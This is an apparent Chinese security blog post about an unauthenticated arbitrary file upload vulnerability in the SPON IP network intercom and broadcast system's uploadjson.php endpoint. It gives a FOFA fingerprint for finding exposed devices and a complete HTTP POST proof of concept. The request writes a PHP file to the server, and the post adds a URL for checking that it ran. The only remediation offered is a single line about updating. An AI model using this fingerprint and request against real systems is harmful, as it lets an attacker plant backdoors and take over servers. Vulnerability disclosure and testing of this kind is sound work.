世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc

python 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

验证url:

python 复制代码
http://your_ip/lan/2.php

修复建议

联系软件厂商更新至最新安全版本

相关推荐
老蒋新思维几秒前
创客匠人启示录:AI 时代知识变现的效率革命 —— 从人力驱动到智能体自动化的跃迁
网络·人工智能·网络协议·tcp/ip·数据挖掘·创始人ip·创客匠人
casdfxx3 分钟前
配置v3s支持8188eu、8192cu网卡(三)-openssh不能登录linux开发板。
linux·服务器·网络
月亮!4 分钟前
IoT测试全解析:从嵌入式到云端的质量链条
运维·网络·人工智能·python·物联网·测试工具·自动化
九章云极DataCanvas12 分钟前
麦肯锡11月最新报告《Agentic AI安全部署手册》:Agentic AI安全不是“贴膏药”,而是“打地基”(附报告原文
人工智能·科技·安全·云计算·云算力
技术爬爬虾13 分钟前
为什么React的漏洞能攻破服务器?Next.js与RSC入门基础
前端·数据库·安全
真正的醒悟17 分钟前
图解网络26
网络·智能路由器
华硕之声27 分钟前
笔记本自带键盘失灵了怎么办,Windows自带触摸板手写输入
科技·安全·ai
-耿瑞-27 分钟前
两台手机连接同一个网络IP会相同嘛?怎么解决这个问题?
网络·tcp/ip·智能手机
济南壹软网络科技有限公司32 分钟前
壹软V4Max 旗舰版:定义新一代盲盒电商生态系统
php·盲盒源码·盲盒h5·国际盲盒源码
Web极客码44 分钟前
如何在WordPress网站中添加Cookie弹窗
前端·安全·github·wordpress